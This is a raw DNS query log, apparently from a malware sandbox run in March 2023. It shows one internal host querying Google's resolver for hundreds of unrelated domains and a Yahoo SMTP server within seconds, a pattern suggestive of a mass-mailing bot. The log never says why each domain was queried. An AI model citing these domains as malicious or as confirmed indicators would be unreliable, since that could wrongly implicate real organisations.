                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.222856045 CET192.168.2.68.8.8.80xa8aeStandard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.225455046 CET192.168.2.68.8.8.80x9256Standard query (0)cubodown.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.262448072 CET192.168.2.68.8.8.80x6b06Standard query (0)indonesiamedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.281045914 CET192.168.2.68.8.8.80xff06Standard query (0)siongann.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.282749891 CET192.168.2.68.8.8.80xd03cStandard query (0)forbin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.283962965 CET192.168.2.68.8.8.80x7695Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.285659075 CET192.168.2.68.8.8.80xd58aStandard query (0)semuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.285934925 CET192.168.2.68.8.8.80xb9b0Standard query (0)willsub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.288741112 CET192.168.2.68.8.8.80xa347Standard query (0)ldh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.289999008 CET192.168.2.68.8.8.80xc07aStandard query (0)fdlymca.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.300903082 CET192.168.2.68.8.8.80xb62Standard query (0)sjbmw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.301335096 CET192.168.2.68.8.8.80xe281Standard query (0)insia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.301435947 CET192.168.2.68.8.8.80xf757Standard query (0)impexnc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.302150011 CET192.168.2.68.8.8.80x8883Standard query (0)coxkitchensandbaths.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.302347898 CET192.168.2.68.8.8.80x8af4Standard query (0)softizer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.302783966 CET192.168.2.68.8.8.80xbc42Standard query (0)missnue.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.303148985 CET192.168.2.68.8.8.80xb968Standard query (0)nts-web.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.303236961 CET192.168.2.68.8.8.80x27c1Standard query (0)flamingorecordings.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.303702116 CET192.168.2.68.8.8.80x5f58Standard query (0)shesfit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.303947926 CET192.168.2.68.8.8.80xe705Standard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.304218054 CET192.168.2.68.8.8.80xa47Standard query (0)jnf.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.304929972 CET192.168.2.68.8.8.80xba73Standard query (0)www.muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.306194067 CET192.168.2.68.8.8.80xee1dStandard query (0)clinicasanluis.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.306329012 CET192.168.2.68.8.8.80x8df5Standard query (0)strazynski.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.308727980 CET192.168.2.68.8.8.80xf150Standard query (0)magicomm.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.310497046 CET192.168.2.68.8.8.80x2ab4Standard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.311702013 CET192.168.2.68.8.8.80x5805Standard query (0)kairel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.327569962 CET192.168.2.68.8.8.80xbcd7Standard query (0)vivastay.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.331291914 CET192.168.2.68.8.8.80x5a13Standard query (0)pcoyuncu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.364433050 CET192.168.2.68.8.8.80xc0cStandard query (0)tabbles.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.366242886 CET192.168.2.68.8.8.80x65dfStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.391540051 CET192.168.2.68.8.8.80x8964Standard query (0)araax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.394088984 CET192.168.2.68.8.8.80xe67eStandard query (0)from30ty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.419249058 CET192.168.2.68.8.8.80xe39aStandard query (0)dwid.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.434675932 CET192.168.2.68.8.8.80x88d7Standard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.442104101 CET192.168.2.68.8.8.80xcc32Standard query (0)duiops.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.474082947 CET192.168.2.68.8.8.80x7096Standard query (0)shiner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.474975109 CET192.168.2.68.8.8.80xc266Standard query (0)fdlymca.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.502265930 CET192.168.2.68.8.8.80xdccStandard query (0)smitko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.504421949 CET192.168.2.68.8.8.80xf81bStandard query (0)fortknox.bmA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.507210970 CET192.168.2.68.8.8.80xb9b8Standard query (0)mijash3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.530234098 CET192.168.2.68.8.8.80x3f3dStandard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.549837112 CET192.168.2.68.8.8.80x16cdStandard query (0)hubbikes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.556940079 CET192.168.2.68.8.8.80xe3bdStandard query (0)amic.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.556941032 CET192.168.2.68.8.8.80xa595Standard query (0)hyab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.565193892 CET192.168.2.68.8.8.80x51c5Standard query (0)banvari.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.649333000 CET192.168.2.68.8.8.80x9404Standard query (0)banvari.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.704807043 CET192.168.2.68.8.8.80xb431Standard query (0)dhh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.705482960 CET192.168.2.68.8.8.80xfe14Standard query (0)diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.707441092 CET192.168.2.68.8.8.80x629bStandard query (0)nts-web.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.709877968 CET192.168.2.68.8.8.80xfb02Standard query (0)clinicasanluis.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.709877968 CET192.168.2.68.8.8.80xf8ebStandard query (0)impexnc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.711019993 CET192.168.2.68.8.8.80xe226Standard query (0)hyab.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.713222980 CET192.168.2.68.8.8.80x2d11Standard query (0)cbaben.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.714023113 CET192.168.2.68.8.8.80x9ac3Standard query (0)nettle.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.715342045 CET192.168.2.68.8.8.80x2c8dStandard query (0)mackusick.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.715687037 CET192.168.2.68.8.8.80x1e68Standard query (0)metaforacom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.716052055 CET192.168.2.68.8.8.80x4674Standard query (0)wahw.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.716748953 CET192.168.2.68.8.8.80xd2f2Standard query (0)insia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.717636108 CET192.168.2.68.8.8.80xc112Standard query (0)www.muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.718486071 CET192.168.2.68.8.8.80xa542Standard query (0)lpver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.733877897 CET192.168.2.68.8.8.80x328cStandard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.736135006 CET192.168.2.68.8.8.80x917Standard query (0)mackusick.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.736170053 CET192.168.2.68.8.8.80x9a3bStandard query (0)lpver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.756534100 CET192.168.2.68.8.8.80xc9c0Standard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.780236006 CET192.168.2.68.8.8.80x19c2Standard query (0)avse.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.802105904 CET192.168.2.68.8.8.80x7649Standard query (0)top1oil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.803409100 CET192.168.2.68.8.8.80x246bStandard query (0)oozkranj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.828270912 CET192.168.2.68.8.8.80x9496Standard query (0)smtp.sbcglobal.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.835906029 CET192.168.2.68.8.8.80x5ae4Standard query (0)www.diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.836081982 CET192.168.2.68.8.8.80x986eStandard query (0)hyab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.846999884 CET192.168.2.68.8.8.80x902eStandard query (0)www.stajum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.847177029 CET192.168.2.68.8.8.80x70cfStandard query (0)flamingorecordings.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.864545107 CET192.168.2.68.8.8.80xfdbStandard query (0)epc.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.879826069 CET192.168.2.68.8.8.80xd5cfStandard query (0)oozkranj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.883163929 CET192.168.2.68.8.8.80xa48cStandard query (0)sanfotek.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.888444901 CET192.168.2.68.8.8.80xaf05Standard query (0)atb-lit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.904618025 CET192.168.2.68.8.8.80x47a2Standard query (0)at-shun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.935808897 CET192.168.2.68.8.8.80x3ec6Standard query (0)dataform.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.935808897 CET192.168.2.68.8.8.80xd467Standard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.935808897 CET192.168.2.68.8.8.80x9953Standard query (0)fdlymca.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.935808897 CET192.168.2.68.8.8.80x3ba9Standard query (0)enguita.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.935810089 CET192.168.2.68.8.8.80x841dStandard query (0)aoinko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.935810089 CET192.168.2.68.8.8.80x91bfStandard query (0)absblast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.951116085 CET192.168.2.68.8.8.80x6741Standard query (0)bosado.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.954103947 CET192.168.2.68.8.8.80xda65Standard query (0)cutchie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.955509901 CET192.168.2.68.8.8.80xc87Standard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.957062006 CET192.168.2.68.8.8.80x42adStandard query (0)rokoron.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.958302021 CET192.168.2.68.8.8.80x8b50Standard query (0)adventist.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.960753918 CET192.168.2.68.8.8.80xddebStandard query (0)ncn.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.962745905 CET192.168.2.68.8.8.80x3841Standard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.968158007 CET192.168.2.68.8.8.80x7fc0Standard query (0)orbitgas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.976015091 CET192.168.2.68.8.8.80x7848Standard query (0)techtrans.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.986988068 CET192.168.2.68.8.8.80xec92Standard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.995379925 CET192.168.2.68.8.8.80x3025Standard query (0)aiolos-sa.grA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.017333031 CET192.168.2.68.8.8.80x9d34Standard query (0)bossinst.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.030714035 CET192.168.2.68.8.8.80xcba5Standard query (0)kevyt.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.030714035 CET192.168.2.68.8.8.80x148fStandard query (0)fr-dat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.060549974 CET192.168.2.68.8.8.80x89eeStandard query (0)cpmteam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.077620029 CET192.168.2.68.8.8.80xcde1Standard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.078867912 CET192.168.2.68.8.8.80xb833Standard query (0)infotech.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.098551989 CET192.168.2.68.8.8.80xe91bStandard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.105463982 CET192.168.2.68.8.8.80xf14dStandard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.128453016 CET192.168.2.68.8.8.80x8f4cStandard query (0)www.vitaindu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.131963968 CET192.168.2.68.8.8.80x1e72Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.145690918 CET192.168.2.68.8.8.80xbd30Standard query (0)popbook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.181282997 CET192.168.2.68.8.8.80x8926Standard query (0)ldh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.194552898 CET192.168.2.68.8.8.80x3803Standard query (0)akr.co.idA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.197951078 CET192.168.2.68.8.8.80xf0bcStandard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.238043070 CET192.168.2.68.8.8.80x5543Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.259617090 CET192.168.2.68.8.8.80xdc56Standard query (0)hyabmagneter.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.263930082 CET192.168.2.68.8.8.80x43bfStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.269432068 CET192.168.2.68.8.8.80xd1f1Standard query (0)notis.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.276813984 CET192.168.2.68.8.8.80x65d9Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.285896063 CET192.168.2.68.8.8.80x3a09Standard query (0)isom.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.298779964 CET192.168.2.68.8.8.80x71c5Standard query (0)aba.org.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.299396992 CET192.168.2.68.8.8.80xc023Standard query (0)kevyt.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.299582005 CET192.168.2.68.8.8.80x984dStandard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.304025888 CET192.168.2.68.8.8.80x4ed1Standard query (0)top1oil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.304781914 CET192.168.2.68.8.8.80x5ff9Standard query (0)rkengg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.360357046 CET192.168.2.68.8.8.80x2e3cStandard query (0)hamaker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.363095045 CET192.168.2.68.8.8.80x2320Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.366399050 CET192.168.2.68.8.8.80x636fStandard query (0)vdoherty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.375386000 CET192.168.2.68.8.8.80x6825Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.375386000 CET192.168.2.68.8.8.80x8cb7Standard query (0)t-trust.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.386977911 CET192.168.2.68.8.8.80x4e2dStandard query (0)hubbikes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.392807007 CET192.168.2.68.8.8.80x65dfStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.404779911 CET192.168.2.68.8.8.80xd021Standard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.409162998 CET192.168.2.68.8.8.80xaa6aStandard query (0)willsub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.410279989 CET192.168.2.68.8.8.80x8edcStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.413949966 CET192.168.2.68.8.8.80x797fStandard query (0)gbp-jp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.438348055 CET192.168.2.68.8.8.80x3bd8Standard query (0)dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.448168039 CET192.168.2.68.8.8.80xe0d2Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.454909086 CET192.168.2.68.8.8.80xc594Standard query (0)amerifor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.480669022 CET192.168.2.68.8.8.80x2676Standard query (0)www.diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.498264074 CET192.168.2.68.8.8.80x64a8Standard query (0)anduran.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.546710968 CET192.168.2.68.8.8.80x5a4dStandard query (0)cbaben.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.547960043 CET192.168.2.68.8.8.80x3905Standard query (0)xinhui.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.550292015 CET192.168.2.68.8.8.80x4955Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.551615953 CET192.168.2.68.8.8.80xacf6Standard query (0)skgm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.553873062 CET192.168.2.68.8.8.80xaa1bStandard query (0)hyabmagneter.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.591869116 CET192.168.2.68.8.8.80x4f74Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.597819090 CET192.168.2.68.8.8.80x16e3Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.611418009 CET192.168.2.68.8.8.80x9239Standard query (0)biurohera.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.634556055 CET192.168.2.68.8.8.80x45eaStandard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.645042896 CET192.168.2.68.8.8.80x8339Standard query (0)gydrozo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.647192001 CET192.168.2.68.8.8.80x49b6Standard query (0)nblewis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.651289940 CET192.168.2.68.8.8.80xe9d7Standard query (0)biurohera.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.654886961 CET192.168.2.68.8.8.80xe296Standard query (0)webavant.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.690005064 CET192.168.2.68.8.8.80x1bbaStandard query (0)anduran.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.703912973 CET192.168.2.68.8.8.80xf4aaStandard query (0)plaske.uaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.716046095 CET192.168.2.68.8.8.80xaed6Standard query (0)wnit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.725075006 CET192.168.2.68.8.8.80x952bStandard query (0)www.hyabmagneter.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.728075981 CET192.168.2.68.8.8.80x5c82Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.732054949 CET192.168.2.68.8.8.80x7d8Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.736495972 CET192.168.2.68.8.8.80x7a80Standard query (0)notis.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.754816055 CET192.168.2.68.8.8.80x77eeStandard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.754816055 CET192.168.2.68.8.8.80x219fStandard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.760031939 CET192.168.2.68.8.8.80x328cStandard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.760116100 CET192.168.2.68.8.8.80xe226Standard query (0)hyab.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.764543056 CET192.168.2.68.8.8.80x5e39Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.780953884 CET192.168.2.68.8.8.80x4597Standard query (0)gydrozo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.781104088 CET192.168.2.68.8.8.80xf6b7Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.790658951 CET192.168.2.68.8.8.80xf5ebStandard query (0)hbfuels.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.803834915 CET192.168.2.68.8.8.80x1bd4Standard query (0)scintel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.819853067 CET192.168.2.68.8.8.80x2011Standard query (0)vonparis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.827120066 CET192.168.2.68.8.8.80xc81aStandard query (0)siongann.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.832523108 CET192.168.2.68.8.8.80xd3e7Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.837838888 CET192.168.2.68.8.8.80x5629Standard query (0)kewlmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.879765987 CET192.168.2.68.8.8.80xe90cStandard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.884037018 CET192.168.2.68.8.8.80x7d8dStandard query (0)wantapc.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.895281076 CET192.168.2.68.8.8.80x94b8Standard query (0)www.hyabmagneter.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.897420883 CET192.168.2.68.8.8.80x19f5Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.923104048 CET192.168.2.68.8.8.80xdc83Standard query (0)tabbles.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.925276995 CET192.168.2.68.8.8.80x410bStandard query (0)infotech.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.954312086 CET192.168.2.68.8.8.80xe7ddStandard query (0)78san.comA (IP address)IN (0x0001)false
